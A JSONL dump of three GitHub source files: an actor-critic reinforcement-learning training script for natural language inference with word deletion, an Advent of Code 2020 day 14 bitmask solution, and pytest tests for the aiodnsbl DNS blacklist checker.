+{"seq_id":"41255664595","text":"import os\nimport sys\nimport time\nimport argparse\nfrom collections import Counter\nimport numpy as np\nimport random\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom data import get_nli, get_batch, build_vocab\nfrom mutils import get_optimizer\nfrom models import critic, actor\nfrom read_data import get_SICK_data\nprint(\"sick: model_actor_avg0.25_17\")\nparser = argparse.ArgumentParser(description='NLI training')\n\nsamplecnt = 1\nepsilon = 0.05\nalpha = 0.1\nverbose = 1\nif verbose:\n f = open(\"results.txt\", \"w\")\n f.close()\n\nbothCritic = \"both_critic0.25abs_nodelay.pickle-ds\"\nbothActor = \"both_actor0.25abs_nodelay.pickle-ds\"\n\n\n# paths\nparser.add_argument(\"--nlipath\", type=str, default='dataset/SNLI/', help=\"NLI data path (SNLI or MultiNLI)\")\nparser.add_argument(\"--outputdir\", type=str, default='savedir/SOUVIK/', help=\"Output directory\")\nparser.add_argument(\"--criticmodelname\", type=str, default='model_best_souvik.pickle')\nparser.add_argument(\"--actormodelname\", type=str, default='model_actor_avg0.25.pickle')\nparser.add_argument(\"--word_emb_path\", type=str, default=\"dataset/glove.840B.300d.txt\", help=\"word embedding file path\")\n\n# training\nparser.add_argument(\"--n_epochs\", type=int, default=1)\nparser.add_argument(\"--batch_size\", type=int, default=5)\nparser.add_argument(\"--dpout_model\", type=float, default=0., help=\"encoder dropout\")\nparser.add_argument(\"--dpout_fc\", type=float, default=0., help=\"classifier dropout\")\nparser.add_argument(\"--nonlinear_fc\", type=float, default=1, help=\"use nonlinearity in fc\")\nparser.add_argument(\"--optimizer\", type=str, default=\"sgd,lr=0.01\", help=\"adam or sgd,lr=0.1\")\nparser.add_argument(\"--lrshrink\", type=float, default=1, help=\"shrink factor for sgd\")\nparser.add_argument(\"--decay\", type=float, default=0.99, help=\"lr decay\")\nparser.add_argument(\"--minlr\", type=float, default=1e-5, help=\"minimum lr\")\nparser.add_argument(\"--max_norm\", type=float, default=5., help=\"max norm (grad clipping)\")\n\n# model\nparser.add_argument(\"--encoder_type\", type=str, default='InferSent', help=\"see list of encoders\")\nparser.add_argument(\"--enc_lstm_dim\", type=int, default=1024, help=\"encoder nhid dimension\")\nparser.add_argument(\"--n_enc_layers\", type=int, default=1, help=\"encoder num layers\")\nparser.add_argument(\"--fc_dim\", type=int, default=512, help=\"nhid of fc layers\")\nparser.add_argument(\"--n_classes\", type=int, default=3, help=\"entailment/neutral/contradiction\")\nparser.add_argument(\"--pool_type\", type=str, default='max', help=\"max or mean\")\n\n# gpu\nparser.add_argument(\"--gpu_id\", type=int, default=0, help=\"GPU ID\")\nparser.add_argument(\"--seed\", type=int, default=1234, help=\"seed\")\n\n# data\nparser.add_argument(\"--word_emb_dim\", type=int, default=300, help=\"word embedding dimension\")\n\nparams, _ = parser.parse_known_args()\n\n# set gpu device\ntorch.cuda.set_device(params.gpu_id)\n\n# print parameters passed, and all parameters\nprint('\\ntogrep : {0}\\n'.format(sys.argv[1:]))\nprint(params)\n\nnp.random.seed(params.seed)\ntorch.manual_seed(params.seed)\ntorch.cuda.manual_seed(params.seed)\n\n\"\"\"\nDATA\n\"\"\"\n#train, valid, test = get_nli(params.nlipath)\n\ntrain, valid, test = get_SICK_data()\n\nword_vec = build_vocab(train['s1'] + train['s2'] +\n valid['s1'] + valid['s2'] +\n test['s1'] + test['s2'], params.word_emb_path)\n\n\nfor split in ['s1', 's2']:\n for data_type in ['train', 'valid', 'test']:\n eval(data_type)[split] = np.array([[word for word in sent.split() if word in word_vec] for sent in eval(data_type)[split]])\n\n\n\n\"\"\"\nMODEL\n\"\"\"\n# model config\nconfig_nli_model = {\n 'n_words' : len(word_vec) ,\n 'word_emb_dim' : params.word_emb_dim ,\n 'enc_lstm_dim' : params.enc_lstm_dim ,\n 'n_enc_layers' : params.n_enc_layers ,\n 'dpout_model' : params.dpout_model ,\n 'dpout_fc' : params.dpout_fc ,\n 'fc_dim' : params.fc_dim ,\n 'bsize' : params.batch_size ,\n 'n_classes' : params.n_classes ,\n 'pool_type' : params.pool_type ,\n 'nonlinear_fc' : params.nonlinear_fc ,\n 'encoder_type' : params.encoder_type ,\n 'use_cuda' : True ,\n\n}\n\n# model\nencoder_types = ['InferSent', 'BLSTMprojEncoder', 'BGRUlastEncoder',\n 'InnerAttentionMILAEncoder', 'InnerAttentionYANGEncoder',\n 'InnerAttentionNAACLEncoder', 'ConvNetEncoder', 'LSTMEncoder']\nassert params.encoder_type in encoder_types, \"encoder_type must be in \" + \\\n str(encoder_types)\nnli_net = critic(config_nli_model)\nactorModel = actor(params.enc_lstm_dim, params.word_emb_dim)\nprint(nli_net)\nprint(actorModel)\n\n\nfor name, x in nli_net.named_parameters():\n print(name)\n\nfor name, x in actorModel.named_parameters():\n print(name)\n\n#print(nli_net.target_pred.enc_lstm.weight_ih_l0)\n#print(nli_net.target_classifier[4].bias)\n\n# loss\nweight = torch.FloatTensor(params.n_classes).fill_(1)\nloss_fn = nn.CrossEntropyLoss(weight=weight)\nloss_fn.size_average = False\n\n\n# optimizer\noptim_fn, optim_params = get_optimizer(params.optimizer)\ncritic_target_optimizer = optim_fn(list(nli_net.target_pred.parameters()) + list(nli_net.target_classifier.parameters()), **optim_params)\n\noptim_fn2, optim_params2 = get_optimizer(params.optimizer)\ncritic_active_optimizer = optim_fn(list(nli_net.active_pred.parameters()) + list(nli_net.active_classifier.parameters()), **optim_params2)\n\n\noptim_fn3, optim_params3 = get_optimizer(\"adam,lr=0.1\")\nactor_target_optimizer = optim_fn3(actorModel.target_policy.parameters(), **optim_params3)\n\noptim_fn4, optim_params4 = get_optimizer(\"adam,lr=0.1\")\nactor_active_optimizer = optim_fn4(actorModel.active_policy.parameters(), **optim_params4)\n\n# cuda by default\nnli_net.cuda()\nactorModel.cuda()\nloss_fn.cuda()\n\n\ndef Sampling_RL(current, summary, length, epsilon, Random = True):\n current_lower_state = torch.zeros(1, 2*params.enc_lstm_dim).cuda()\n current = current.squeeze(0)\n actions = []\n states = []\n for pos in range(0, length):\n predicted = actorModel.get_target_output(current_lower_state, current[pos], summary, scope = \"target\")\n states.append([current_lower_state, current[pos], summary])\n if Random:\n if random.random() > epsilon:\n action = (0 if random.random() < float(predicted[0].item()) else 1)\n else:\n action = (1 if random.random() < float(predicted[0].item()) else 0)\n else:\n action = int(torch.argmax(predicted))\n actions.append(action)\n if action == 1:\n out_d, current_lower_state = nli_net.forward_lstm(current_lower_state, current[pos], scope = \"target\")\n\n Rinput = []\n for (i, a) in enumerate(actions):\n if a == 1:\n Rinput.append(current[i])\n Rlength = len(Rinput)\n \n if Rlength == 0:\n actions[length-2] = 1\n Rinput.append(current[length-2])\n Rlength = 1\n \n Rinput = torch.stack(Rinput)\n return actions, states, Rinput, Rlength\n \n\n\"\"\"\nTRAIN\n\"\"\"\nval_acc_best = -1e10\nadam_stop = False\nstop_training = False\nlr = optim_params2['lr'] if 'sgd' in params.optimizer else None\n\n\ndef trainepoch(epoch, RL_train = True, LSTM_train = True):\n print('\\nTRAINING : Epoch ' + str(epoch))\n \n actorModel.train(False)\n nli_net.train(False)\n if RL_train:\n print(\"Actor Training\")\n print('Learning rate : {0}'.format(actor_active_optimizer.param_groups[0]['lr']))\n actorModel.train()\n if LSTM_train:\n print(\"InferSent Training\")\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] * params.decay if epoch>1\\\n and 'sgd' in params.optimizer else critic_active_optimizer.param_groups[0]['lr']\n print('Learning rate : {0}'.format(critic_active_optimizer.param_groups[0]['lr']))\n nli_net.train()\n \n all_costs = []\n logs = []\n words_count = 0\n\n last_time = time.time()\n correct = 0.\n # shuffle the data\n permutation = np.random.permutation(len(train['s1']))\n\n s1 = train['s1'][permutation]\n s2 = train['s2'][permutation]\n target = train['label'][permutation]\n\n\n for stidx in tqdm(range(0, len(s1), params.batch_size)):\n \n s1_batch, s1_len = get_batch(s1[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[stidx:stidx + s1_batch.size(1)])).cuda()\n k = s1_batch.size(1) # actual batch size\n predict = torch.zeros(s1_batch.size(1), params.n_classes).cuda()\n avgloss = 0.\n totloss = 0.\n nli_net.assign_active_network()\n actorModel.assign_active_network()\n #print(\"Target Weight: \", actorModel.target_policy.W1.weight.data, \"\\n\\n\")\n for kk in range(s1_batch.size(1)):\n left = s1_batch.transpose(0,1)[kk].view(-1, 1, 300)\n right = s2_batch.transpose(0,1)[kk].view(-1, 1, 300)\n left_len = np.array([s1_len[kk]])\n right_len = np.array([s2_len[kk]])\n tgt = tgt_batch[kk].view(-1)\n if RL_train:\n leftSummary = nli_net.summary((left, left_len))[-1]\n rightSummary = nli_net.summary((right, right_len))[-1]\n actionlist_left, actionlist_right, statelist_left, statelist_right, losslist = [], [], [], [], []\n aveloss = 0.\n for i in range(samplecnt):\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=True)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=True)\n actionlist_left.append(actions_left)\n statelist_left.append(states_left)\n actionlist_right.append(actions_right)\n statelist_right.append(states_right)\n out = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n loss_ = loss_fn(out, tgt)\n lossL = (((float(Rlength_left) / int(left.size(1))) + (int(left.size(1)) / float(Rlength_left)) * 0.25) - 1.0)\n lossR = (((float(Rlength_right) / int(right.size(1))) + (int(right.size(1)) / float(Rlength_right)) * 0.25) - 1.0)\n loss_ = loss_ + ((lossL + lossR)/2) * 0.1 * params.n_classes\n aveloss += loss_\n losslist.append(loss_)\n aveloss /= samplecnt\n totloss += aveloss\n grad1 = None\n grad2 = None\n grad3 = None\n grad4 = None\n flag = 0 \n if LSTM_train:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n actor_target_optimizer.zero_grad()\n for i in range(samplecnt): #5\n for pos in range(len(actionlist_left[i])): #19 --> 13\n rr = [0, 0]\n rr[actionlist_left[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_left[i][pos][0], statelist_left[i][pos][1], statelist_left[i][pos][2], rr, scope = \"target\")\n if flag == 0:\n grad1 = g[0]\n grad2 = g[1]\n grad3 = g[2]\n grad4 = g[3]\n flag = 1\n else:\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n for pos in range(len(actionlist_right[i])): # 25 --> 5\n rr = [0, 0]\n rr[actionlist_right[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_right[i][pos][0], statelist_right[i][pos][1], statelist_right[i][pos][2], rr, scope = \"target\")\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n actor_active_optimizer.zero_grad()\n actorModel.assign_active_network_gradients(grad1, grad2, grad3, grad4)\n \n actor_active_optimizer.step()\n #output = nli_net((left, left_len), (right, right_len), \"target\")\n _, _, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n _, _, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n else:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n output = nli_net((left, left_len), (right, right_len), \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n if RL_train:\n pass\n #actorModel.update_target_network()\n '''\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n '''\n \n if LSTM_train:\n nli_net.update_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n else:\n nli_net.assign_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n \n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n if LSTM_train:\n train_acc = round(100 * correct.item()/len(s1), 2)\n print('results : epoch {0} ; mean accuracy train : {1}'.format(epoch, train_acc))\n return train_acc\n else:\n return None\n\ndef evaluate(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n for i in range(0, len(s1), params.batch_size):\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + params.batch_size])).cuda()\n\n # model forward\n output = nli_net((s1_batch, s1_len), (s2_batch, s2_len), \"target\")\n\n pred = output.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n if final_eval:\n print('finalgrep : accuracy {0} : {1}'.format(eval_type, eval_acc))\n else:\n print('togrep : results : epoch {0} ; mean accuracy {1} :\\\n {2}'.format(epoch, eval_type, eval_acc))\n\n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir,\n params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\ndef evaluate_RL(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n actorModel.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n ll, rl, ll_, rl_ = 0, 0, 0, 0\n deleteCount = dict()\n wordCount = dict()\n for i in range(0, len(s1)):\n if i % 100 == 0:\n print(\"Evaluating... \", i)\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + 1], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + 1], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + 1])).cuda()\n\n # model forward\n leftSummary = nli_net.summary((s1_batch, s1_len))[-1]\n rightSummary = nli_net.summary((s2_batch, s2_len))[-1]\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(s1_batch, rightSummary, int(s1_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(s2_batch, leftSummary, int(s2_len), epsilon, Random=False)\n #print(s1_batch.size(), actions_left, Rinput_left.size(), s2_batch.size(), actions_right, Rinput_right.size(), \"\\n\\n\")\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n\n pred = output.data.max(1)[1]\n\n if verbose:\n sourceL = s1[i:i + 1][0]\n sourceR = s2[i:i + 1][0]\n tempL, tempR = [], []\n \n for x in range(1,len(actions_left)-1):\n \n if sourceL[x] not in wordCount.keys():\n wordCount[sourceL[x]] = 1\n else:\n wordCount[sourceL[x]] += 1\n \n if actions_left[x] == 1:\n tempL.append(sourceL[x])\n if actions_left[x] == 0:\n if sourceL[x] not in deleteCount.keys():\n deleteCount[sourceL[x]] = 1\n else:\n deleteCount[sourceL[x]] += 1\n \n for x in range(1,len(actions_right)-1):\n \n if sourceR[x] not in wordCount.keys():\n wordCount[sourceR[x]] = 1\n else:\n wordCount[sourceR[x]] += 1\n\n if actions_right[x] == 1:\n tempR.append(sourceR[x])\n if actions_right[x] == 0:\n if sourceR[x] not in deleteCount.keys():\n deleteCount[sourceR[x]] = 1\n else:\n deleteCount[sourceR[x]] += 1\n \n with open(\"results.txt\", \"a\") as f:\n f.write(\" \".join(sourceL[1:-1]) + \"-----\" + \" \".join(sourceR[1:-1]) + \"\\n\")\n f.write(\" \".join(tempL) + \"-----\" + \" \".join(tempR) + \"\\nactual: \" + str(int(tgt_batch)) + \" pred: \" + str(int(pred)) + \"\\n\\n\")\n ll += len(actions_left)\n rl += len(actions_right)\n ll_ += Counter(actions_left)[1]\n rl_ += Counter(actions_right)[1] \n \n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n with open(\"results.txt\", \"a\") as f:\n f.write(\"Average left: \" + str(ll/len(s1)) + \"\\nAverage left new: \" + str(ll_/len(s1)) + \"\\nAverage right: \" + str(rl/len(s1)) + \"\\nAverage right new: \" + str(rl_/len(s1)))\n #f.write(deleteCount + \"\\n\\n\\n\" + wordCount)\n for key, value in sorted(deleteCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n f.write(\"\\n\\n\\n\")\n for key, value in sorted(wordCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n print(eval_type, \" accuracy: \", eval_acc)\n \n if final_eval:\n params.criticmodelname = bothCritic\n params.actormodelname = bothActor\n \n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(actorModel.state_dict(), os.path.join(params.outputdir, params.actormodelname))\n if final_eval:\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir, params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if final_eval:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\n\n\n\n''' INITIAL CRITIC TRAIN\n\"\"\"\nTrain model on Natural Language Inference task\n\"\"\"\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n train_acc = trainepoch(epoch, RL_train = False)\n eval_acc = evaluate(epoch, 'valid')\n epoch += 1\n\n# Run best model on test set.\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nprint(evaluate(epoch, 'test'))\nprint(evaluate(epoch, 'valid'))\n'''\n\n'''\nprint(\"ACTOR TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n print(trainepoch(epoch, LSTM_train = False))\n eval_acc = evaluate_RL(epoch, 'valid')\n epoch += 1\n\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\n#print(evaluate_RL(epoch, 'train'))\n#print(evaluate_RL(epoch, 'test'))\nprint(evaluate_RL(epoch, 'test'))\n'''\n\nprint(\"FINAL CRITIC TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\nepoch = 1\nwhile not stop_training and epoch <=params.n_epochs:\n train_acc = trainepoch(epoch)\n eval_acc = evaluate_RL(epoch, 'valid', final_eval = True)\n print(eval_acc)\n epoch += 1\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, bothCritic)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, bothActor)))\nprint(\"\\nActor Loaded\")\nprint(evaluate_RL(epoch, 'test'))\n\n\n","repo_name":"souvik491/RL-Final-Assignment","sub_path":"RL - Souvik Kundu/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7766735382","text":"from itertools import product\n\ndef parse_instructions(lines):\n instructions = []\n for line in lines:\n instruction = {}\n tokens = line.split()\n if tokens[0] == 'mask':\n instruction['type'] = 'mask'\n instruction['value'] = tokens[-1]\n else:\n address = tokens[0].split('[')[1].split(']')[0]\n instruction['type'] = 'mem'\n instruction['address'] = int(address)\n instruction['value'] = int(tokens[-1])\n instructions.append(instruction)\n\n return instructions\n\n\ndef apply_mask(mask_string, number):\n\n binary = list(bin(number)[2:].rjust(36, '0'))\n\n x_indices = []\n for (i, char) in enumerate(mask_string):\n if char == '1':\n binary[i] = '1'\n if char == 'X':\n x_indices.append(i)\n\n numbers = []\n if not len(x_indices):\n numbers.append(binary)\n\n combinations = [[0,1] for index in x_indices]\n combinations = product(*combinations)\n\n for combination in combinations:\n new_binary = binary.copy()\n for (i,value) in enumerate(combination):\n new_binary[x_indices[i]] = str(value)\n numbers.append(new_binary)\n\n return list(map(lambda x: int(x, 2), map(lambda x: \"\".join(x), numbers)))\n\n\ndef run(instructions, memory):\n current_mask = None\n for instruction in instructions:\n if instruction['type'] == 'mask':\n current_mask = instruction['value']\n else:\n addresses = apply_mask(current_mask, int(instruction['address']))\n for address in addresses:\n memory[address] = instruction['value']\n\n\nwith open('input', 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n\ninstructions = parse_instructions(lines)\n\nmemory = {}\n\nrun(instructions, memory)\n\nprint(sum(memory.values()))\n","repo_name":"medvesekg/adventofcode2020","sub_path":"14/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35337295884","text":"import pytest\n\nfrom aiodnsbl.checker import DNSBLChecker\nfrom aiodnsbl.providers import BASE_DOMAIN_PROVIDERS, BASE_PROVIDERS\n\n\n@pytest.mark.asyncio\nasync def test_checker():\n checker = DNSBLChecker()\n\n res = await checker.check(\"68.128.212.240\")\n assert res.blacklisted is True\n assert len(res.detected_by) > 0\n assert len(res.providers) == len(BASE_PROVIDERS)\n\n results = await checker.bulk_check([\"68.128.212.240\", \"8.8.8.8\"])\n assert len(results) == 2\n\n res = await checker.check(\"9.9.9.9\")\n assert res.blacklisted is False\n assert len(res.detected_by) == 0\n\n\n@pytest.mark.asyncio\nasync def test_checker_ipv6():\n checker = DNSBLChecker()\n res = await checker.check(\"2001:4860:4860::8844\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_domain_checker():\n checker = DNSBLChecker()\n domain = \"example.com\"\n res = await checker.check(domain)\n assert res.blacklisted is False\n assert len(res.providers) == len(BASE_DOMAIN_PROVIDERS)\n\n\n@pytest.mark.asyncio\nasync def test_domain_idna():\n checker = DNSBLChecker()\n res = await checker.check(\"вуцхгйю.рф\")\n assert res.address == \"вуцхгйю.рф\"\n\n\n@pytest.mark.asyncio\nasync def test_domain_providers():\n checker = DNSBLChecker()\n res = await checker.check(\"google.com\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_wrong_domain_format():\n invalid_inputs = [\"abc-\", \"8.8.8.256\"]\n for invalid_input in invalid_inputs:\n checker = DNSBLChecker()\n with pytest.raises(ValueError):\n await checker.check(invalid_input)\n\n\n@pytest.mark.asyncio\nasync def test_capitalization_in_domain():\n capitalized_domains = [\"Google.com\", \"Facebook.com\"]\n for domain in capitalized_domains:\n checker = DNSBLChecker()\n res = await checker.check(domain)\n assert res.blacklisted is False\n","repo_name":"ninoseki/aiodnsbl","sub_path":"tests/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
